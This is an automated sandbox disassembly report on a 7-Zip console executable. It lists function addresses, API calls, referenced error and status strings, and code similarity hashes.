Opcode ID: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
Instruction ID: 127f561f90bbd578badf28e2aa65a6be7f0d70df10b3245b4ba776d5cc46da54
Opcode Fuzzy Hash: a977c30e9b6c0c77fa91ba2bef927ebd8b73980ec7f1edacc1f00c6c713dab27
Instruction Fuzzy Hash: A8826D32218A8886CB30EF25E4903BEB360F7E5B94F544126EBAD57B59DF78C945CB10

Function 001F47AC Relevance: 86.1, APIs: 56, Strings: 1, Instructions: 647
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001D3314: memmove.MSVCRT ref: 001D3339

free.MSVCRT ref: 001F48E0
free.MSVCRT ref: 001F48EE
free.MSVCRT ref: 001F49B8
free.MSVCRT ref: 001F49F1
free.MSVCRT ref: 001F49FF
free.MSVCRT ref: 001F4A0D
free.MSVCRT ref: 001F4A18
free.MSVCRT ref: 001F4A47
free.MSVCRT ref: 001F4A4F
free.MSVCRT ref: 001F4A5D
free.MSVCRT ref: 001F5052

Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C

free.MSVCRT ref: 001F4C20
free.MSVCRT ref: 001F4C2E
free.MSVCRT ref: 001F4C3C
free.MSVCRT ref: 001F4C47
free.MSVCRT ref: 001F4C79
free.MSVCRT ref: 001F4C81
free.MSVCRT ref: 001F4C90
free.MSVCRT ref: 001F4CB3
free.MSVCRT ref: 001F4CC1
free.MSVCRT ref: 001F4CCF
free.MSVCRT ref: 001F4CDA
free.MSVCRT ref: 001F4D0C
free.MSVCRT ref: 001F4D14
free.MSVCRT ref: 001F4D23
free.MSVCRT ref: 001F4D76
free.MSVCRT ref: 001F4D84
free.MSVCRT ref: 001F4D92
free.MSVCRT ref: 001F4D9D
free.MSVCRT ref: 001F4DCC
free.MSVCRT ref: 001F4DD4
free.MSVCRT ref: 001F4DE3
GetLastError.KERNEL32 ref: 001F4E70
free.MSVCRT ref: 001F4EB2
free.MSVCRT ref: 001F4EC0
free.MSVCRT ref: 001F4ECE
free.MSVCRT ref: 001F4ED9
free.MSVCRT ref: 001F4F08
free.MSVCRT ref: 001F4F10
free.MSVCRT ref: 001F4F1F
free.MSVCRT ref: 001F4FD5
free.MSVCRT ref: 001F4FE3
free.MSVCRT ref: 001F4FF1
free.MSVCRT ref: 001F4FFC
free.MSVCRT ref: 001F502B
free.MSVCRT ref: 001F5033
free.MSVCRT ref: 001F5042
_CxxThrowException.MSVCRT ref: 001F510C
free.MSVCRT ref: 001F51B9
free.MSVCRT ref: 001F51C7
free.MSVCRT ref: 001F51D5
free.MSVCRT ref: 001F51E0
free.MSVCRT ref: 001F520F
free.MSVCRT ref: 001F5217
free.MSVCRT ref: 001F5226
free.MSVCRT ref: 001F5234

Strings

Can not create output directory: , xrefs: 001F4E83

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$memmove$ErrorExceptionLastThrow
String ID: Can not create output directory:
API String ID: 4159955631-3123869724
Opcode ID: 413c8c4aa713bf56841916301f3c023350d4de2d962ce64e83949b71d0a2ade2
Instruction ID: c04ac1099e3031d672d5cf941f95d081f999c0ec4e05742d2a6c929ff380a024
Opcode Fuzzy Hash: 413c8c4aa713bf56841916301f3c023350d4de2d962ce64e83949b71d0a2ade2
Instruction Fuzzy Hash: C1426C32219AC496CB30EF25E8903AEB361F7E6B80F585122DB9D43B59DF38D955CB00

Function 001F5458 Relevance: 74.2, APIs: 47, Strings: 2, Instructions: 702
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 001F558E
_CxxThrowException.MSVCRT ref: 001F55C2
_CxxThrowException.MSVCRT ref: 001F55E6
memset.MSVCRT ref: 001F561F
free.MSVCRT ref: 001F56F2
free.MSVCRT ref: 001F5F84

Strings

there is no such archive, xrefs: 001F55A4, 001F5EF9
can't decompress folder, xrefs: 001F55C8

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$ExceptionThrow$memset
String ID: can't decompress folder$there is no such archive
API String ID: 4182836161-2069749860
Opcode ID: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
Instruction ID: 934c75cfa3e973a62d665c9d6ae67d23b7482d93eea55f414f1bffbf9ef463ed
Opcode Fuzzy Hash: ce4216a456ecfb562eed58e09bd1e089566f6c8440c9455ca6f18eb35ebed729
Instruction Fuzzy Hash: 29526A33209AC486CB24EF25E4843AEB761F79AB94F455122DF9E53B29DF38C855CB00

Function 001FF13E Relevance: 59.4, APIs: 47, Instructions: 683COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eadb98abd82e25e36940fb318a204b117e1ed3c7f246080696e62d728c723bb
Instruction ID: 054a8843d0f483835707f154c469ab320af517d9ee66e234d45d924c9354c278
Opcode Fuzzy Hash: 5eadb98abd82e25e36940fb318a204b117e1ed3c7f246080696e62d728c723bb
Instruction Fuzzy Hash: 8042AF3B219AC486CB24DF25E0946BF7765F79AB88F455016EB5E43B16CF78C88AC700

Function 001E0DCC Relevance: 51.4, APIs: 17, Strings: 12, Instructions: 652COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 001E0E15
free.MSVCRT ref: 001E0E4E
_CxxThrowException.MSVCRT ref: 001E0E7A
free.MSVCRT ref: 001E0EBD
wcscmp.MSVCRT ref: 001E0F33
_CxxThrowException.MSVCRT ref: 001E0F9B
_CxxThrowException.MSVCRT ref: 001E112A
_CxxThrowException.MSVCRT ref: 001E13AC
_CxxThrowException.MSVCRT ref: 001E14D3
_CxxThrowException.MSVCRT ref: 001E15E3
_CxxThrowException.MSVCRT ref: 001E1730
_CxxThrowException.MSVCRT ref: 001E1761
_CxxThrowException.MSVCRT ref: 001E17A2
_CxxThrowException.MSVCRT ref: 001E1801
_CxxThrowException.MSVCRT ref: 001E186B
_CxxThrowException.MSVCRT ref: 001E1171

Part of subcall function 001D63D0: free.MSVCRT ref: 001D6440
Part of subcall function 001D63D0: free.MSVCRT ref: 001D6448

_CxxThrowException.MSVCRT ref: 001E18F2

Strings

stdout mode and email mode cannot be combined, xrefs: 001E1710
I won't write data and program's messages to same stream, xrefs: 001E14B3, 001E1782
The command must be specified, xrefs: 001E0DF5
I won't write compressed data to a terminal, xrefs: 001E1741
Incorrect Number of benmchmark iterations, xrefs: 001E1847
-ai switch is not supported for this command, xrefs: 001E15C3
Archive name cannot by empty, xrefs: 001E1151
Unsupported command:, xrefs: 001E0E57
Cannot use absolute pathnames for this command, xrefs: 001E138C
Unsupported -spf:, xrefs: 001E0F7E
Only one archive can be created with rename command, xrefs: 001E17E1
Cannot find archive name, xrefs: 001E110A

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: ExceptionThrow$free$wcscmp
String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect Number of benmchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -spf:$Unsupported command:$stdout mode and email mode cannot be combined
API String ID: 1252877886-1892825451
Opcode ID: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
Instruction ID: c685a178a54e7a970e6642efa50ab05c8e41472b7f266b41fa8f4dce0a2c90cb
Opcode Fuzzy Hash: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
Instruction Fuzzy Hash: 3452E273304AC5A7DB29CF2AD5943AEBB61F359744F888026DB9903B12DB78D5B8C700

Function 001E1D04 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 001E1D12
CloseHandle.KERNEL32 ref: 001E1D25
OpenProcessToken.ADVAPI32 ref: 001E1D48
LookupPrivilegeValueW.ADVAPI32 ref: 001E1D70
AdjustTokenPrivileges.KERNELBASE ref: 001E1D93
CloseHandle.KERNEL32 ref: 001E1DA7
GetLastError.KERNEL32 ref: 001E1DB1
CloseHandle.KERNELBASE ref: 001E1DC6

Strings

SeSecurityPrivilege, xrefs: 001E1D57

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeSecurityPrivilege
API String ID: 1313864721-2333288578
Opcode ID: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
Instruction ID: 41cf4ce46da1a64c128f820b0cb92381b3c9fc3c63f22caac82500d5ad244356
Opcode Fuzzy Hash: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
Instruction Fuzzy Hash: F3115172204F80E2DA41CB52FE583ADB3A6FBD8B81F940412EA9F42A58CF7CC549C710

Function 001DAC74 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 001DAC84
OpenProcessToken.ADVAPI32 ref: 001DAC95
LookupPrivilegeValueW.ADVAPI32 ref: 001DACA9
AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,FFFFFFFF,?,001DF928), ref: 001DACE0
GetLastError.KERNEL32(?,?,?,?,?,?,?,FFFFFFFF,?,001DF928), ref: 001DACEA
CloseHandle.KERNELBASE ref: 001DACFA

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3398352648-0
Opcode ID: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
Instruction ID: 400d42aee3bb60a65c35cf67ed5124fb3e06efd36999a220a9a9c8b4b77aa89a
Opcode Fuzzy Hash: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
Instruction Fuzzy Hash: 1B018C7361468187DB50CFA0E9887DA73A1F784B95F944136EB9A82A58CF3CC889CB00

Function 001D7978 Relevance: 4.6, APIs: 3, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001D794C: FindClose.KERNELBASE ref: 001D795E

FindFirstFileW.KERNELBASE ref: 001D79BA

Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2

FindFirstFileW.KERNELBASE ref: 001D79FA
free.MSVCRT ref: 001D7A08

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: Find$FileFirstfree$Closememmove
String ID:
API String ID: 2921071498-0
Opcode ID: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
Instruction ID: ee079ebd1b2647b850817852b2078151e5bdad47a55b0ef68495db1cdf40e364
Opcode Fuzzy Hash: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
Instruction Fuzzy Hash: 42211C37208A8086DB21DF24E45039D6361F79A7B8F548322EAB9477D9EF38CA09C701

Function 001E4418 Relevance: 219.6, APIs: 132, Strings: 13, Instructions: 2096COMMON

Download Yara Rule

Strings

Can not set length for output file, xrefs: 001E63C0
Can not create file with auto name, xrefs: 001E5796, 001E5867
Internal error for symbolic link file, xrefs: 001E5EFB
Can not delete output folder, xrefs: 001E5A0E
Can not create hard link, xrefs: 001E5E04, 001E61B7
Can not open output file, xrefs: 001E62D7
\??\, xrefs: 001E485F
Can not delete output file, xrefs: 001E5AD5
Dangerous link path was ignored, xrefs: 001E5CC1
Can not rename existing file, xrefs: 001E592F
Can not seek to begin of file, xrefs: 001E642F
Can not create symbolic link, xrefs: 001E5FAB
Incorrect path, xrefs: 001E5D6E

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID:
String ID: Can not create file with auto name$Can not create hard link$Can not create symbolic link$Can not delete output file$Can not delete output folder$Can not open output file$Can not rename existing file$Can not seek to begin of file$Can not set length for output file$Dangerous link path was ignored$Incorrect path$Internal error for symbolic link file$\??\
API String ID: 0-2438533581
Opcode ID: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
Instruction ID: 8155a8c44fb579847cce83a44eec40ac74944b29d7777258ee080ba5af4c71f2
Opcode Fuzzy Hash: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
Instruction Fuzzy Hash: 8D036132248EC082CB34EB26E4946AEB761F7E5BC4F554112EBAE47B25DF78D985C700

Function 0021950D Relevance: 116.2, APIs: 48, Strings: 18, Instructions: 748
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 002197B9
free.MSVCRT ref: 002197C1
free.MSVCRT ref: 002197D3
free.MSVCRT ref: 002197E0
free.MSVCRT ref: 002197EE
free.MSVCRT ref: 00219809
free.MSVCRT ref: 0021996E
free.MSVCRT ref: 00219976
free.MSVCRT ref: 00219988
free.MSVCRT ref: 00219995
free.MSVCRT ref: 002199A3
free.MSVCRT ref: 002199C0
free.MSVCRT ref: 002199CD
fputs.MSVCRT ref: 00219A02
fputs.MSVCRT ref: 00219A12
_CxxThrowException.MSVCRT ref: 00219A3A

Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311

_CxxThrowException.MSVCRT ref: 0021A5E1
free.MSVCRT ref: 0021A5EF
free.MSVCRT ref: 0021A61C
free.MSVCRT ref: 0021A62E
free.MSVCRT ref: 0021A696
free.MSVCRT ref: 0021A69E
free.MSVCRT ref: 0021A6B0

Part of subcall function 001D3518: free.MSVCRT ref: 001D3551

Strings

ERROR: , xrefs: 002199FB
Archives with Errors: , xrefs: 0021A07A
Alternate Streams Size: , xrefs: 0021A250
Files: , xrefs: 0021A1F6
Archives with Warnings: , xrefs: 0021A0AF
Warnings: , xrefs: 0021A0F0
OK archives: , xrefs: 0021A008
Archives: , xrefs: 00219FE1
Can't open as archive: , xrefs: 0021A03F
Compressed: , xrefs: 0021A2A3
Open Errors: , xrefs: 0021A138
Sub items Errors: , xrefs: 0021A2FB
7zCon.sfx, xrefs: 00219543
Size: , xrefs: 0021A278
Incorrect command line, xrefs: 00219A0B
ERROR:, xrefs: 00219F89
Folders: , xrefs: 0021A1A8
Alternate Streams: , xrefs: 0021A228

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$ExceptionThrowfputs$fputc
String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
API String ID: 1639683984-435538426
Opcode ID: bd9f2b28495a3b62c3d481a4c9c43d8556660cff06a10aff3bafa4e3683c7a09
Instruction ID: 709fe9f5b678d17d77485b864e2a850391194b3ad28bbdbe09e1b7697e9dab50
Opcode Fuzzy Hash: bd9f2b28495a3b62c3d481a4c9c43d8556660cff06a10aff3bafa4e3683c7a09
Instruction Fuzzy Hash: 09728B72319AC195CA30EF25E4943EEB3A1F7A5B80F444526DAAE43B19DF3CC5A5CB01

Function 00219B5D Relevance: 84.5, APIs: 33, Strings: 15, Instructions: 507
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fputs.MSVCRT ref: 00219B6B

Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311

free.MSVCRT ref: 00219C12

Strings

Archives with Errors: , xrefs: 0021A07A
Alternate Streams Size: , xrefs: 0021A250
Files: , xrefs: 0021A1F6
Archives with Warnings: , xrefs: 0021A0AF
Scanning the drive for archives:, xrefs: 00219B64
Warnings: , xrefs: 0021A0F0
OK archives: , xrefs: 0021A008
Archives: , xrefs: 00219FE1
Can't open as archive: , xrefs: 0021A03F
Compressed: , xrefs: 0021A2A3
Open Errors: , xrefs: 0021A138
Size: , xrefs: 0021A278
ERROR:, xrefs: 00219F89
Folders: , xrefs: 0021A1A8
Alternate Streams: , xrefs: 0021A228

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: fputcfputsfree
String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
API String ID: 2822829076-727241755
Opcode ID: fc6ea5868805d76338b3faf932c3aa06514698a3480bc4cc48a2eddf149bc62d
Instruction ID: 4a8b50ceb48a7e0161166495fbbe9d40e9fd1b20411c4299a870aedecdab6353
Opcode Fuzzy Hash: fc6ea5868805d76338b3faf932c3aa06514698a3480bc4cc48a2eddf149bc62d
Instruction Fuzzy Hash: 31224B32319AC1A1CA34EF25E5943EEB3A1F7A5B80F444126DBAE43B19DF38C5A5C701

Function 001FA180 Relevance: 47.6, APIs: 23, Strings: 4, Instructions: 342
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 001FA1BF
GetProcAddress.KERNEL32 ref: 001FA1D2
GetProcAddress.KERNEL32 ref: 001FA1F5
GetProcAddress.KERNEL32 ref: 001FA21E

Strings

GetNumberOfFormats, xrefs: 001FA1EB
GetHandlerProperty2, xrefs: 001FA1B5
GetHandlerProperty, xrefs: 001FA214
GetIsArc, xrefs: 001FA1C8

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: AddressProc
String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
API String ID: 190572456-3984264347
Opcode ID: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
Instruction ID: 0c252e906d0347f1f0c07690ad1c104416afa1ffaae58609ea32486d1ea5f37b
Opcode Fuzzy Hash: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
Instruction Fuzzy Hash: 62D18672319AC496C720EB21E8807AEB3A5FBE5780F845512EB8E87B19DF7CD545CB01

Function 001D70C8 Relevance: 40.7, APIs: 27, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001D7D4C: GetFileAttributesW.KERNELBASE ref: 001D7D6E
Part of subcall function 001D7D4C: GetFileAttributesW.KERNEL32 ref: 001D7DA5
Part of subcall function 001D7D4C: free.MSVCRT ref: 001D7DB2

free.MSVCRT ref: 001D73F6

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: AttributesFilefree
String ID:
API String ID: 1936811914-0
Opcode ID: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
Instruction ID: 61c53a6120d62c25607e5645eb1c54979fe589874a0baf20fdf938211e27043d
Opcode Fuzzy Hash: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
Instruction Fuzzy Hash: 2281512221C58192CA20EF21E45166EA331FBE5784F445123FF9E877A9EF38D945D711

Function 001D7EBC Relevance: 37.2, APIs: 18, Strings: 3, Instructions: 418
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 001D812F
free.MSVCRT ref: 001D816A
free.MSVCRT ref: 001D817F
free.MSVCRT ref: 001D8232

Part of subcall function 001DABB0: GetModuleHandleW.KERNEL32 ref: 001DABD1
Part of subcall function 001DABB0: GetProcAddress.KERNEL32 ref: 001DABE1
Part of subcall function 001DABB0: GetDiskFreeSpaceW.KERNEL32 ref: 001DAC32

SetLastError.KERNEL32 ref: 001D818F
free.MSVCRT ref: 001D819B
free.MSVCRT ref: 001D81A6
free.MSVCRT ref: 001D81BB
free.MSVCRT ref: 001D8243
free.MSVCRT ref: 001D824E
free.MSVCRT ref: 001D815F

Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2

Strings

:, xrefs: 001D7F3A
:$DATA, xrefs: 001D8030, 001D8040
\, xrefs: 001D7F44

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$AddressDiskErrorFreeHandleLastModuleProcSpacememmove
String ID: :$:$DATA$\
API String ID: 4130059181-1004618218
Opcode ID: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
Instruction ID: c5a09588bb05a58ddbd6e665662227ee5203fa457dddddff6e2938926b93d2f7
Opcode Fuzzy Hash: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
Instruction Fuzzy Hash: 1202E773504680D6CB20DF29E59026EB770F7A5750F808227E79E87B68EF34D9A6CB04

Function 00213E84 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fputs.MSVCRT ref: 00213ED4

Part of subcall function 00212E24: fputs.MSVCRT ref: 00212E47
Part of subcall function 00212E24: fputs.MSVCRT ref: 00212E57

fputs.MSVCRT ref: 00213F0F

Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311

free.MSVCRT ref: 00213F4C
fputs.MSVCRT ref: 00213FAA
fputs.MSVCRT ref: 00213FBA
fputs.MSVCRT ref: 00214003
fputs.MSVCRT ref: 00214013
SysFreeString.OLEAUT32 ref: 002140A1
fputs.MSVCRT ref: 002140C9
SysFreeString.OLEAUT32 ref: 0021418B
SysFreeString.OLEAUT32 ref: 002141C2

Strings

= , xrefs: 00213FB3, 0021400C
Type, xrefs: 00213F76
Warning: The archive is open with offset, xrefs: 00213F08
----, xrefs: 002140C2
Path, xrefs: 00213EE4
--, xrefs: 00213ECD

Memory Dump Source

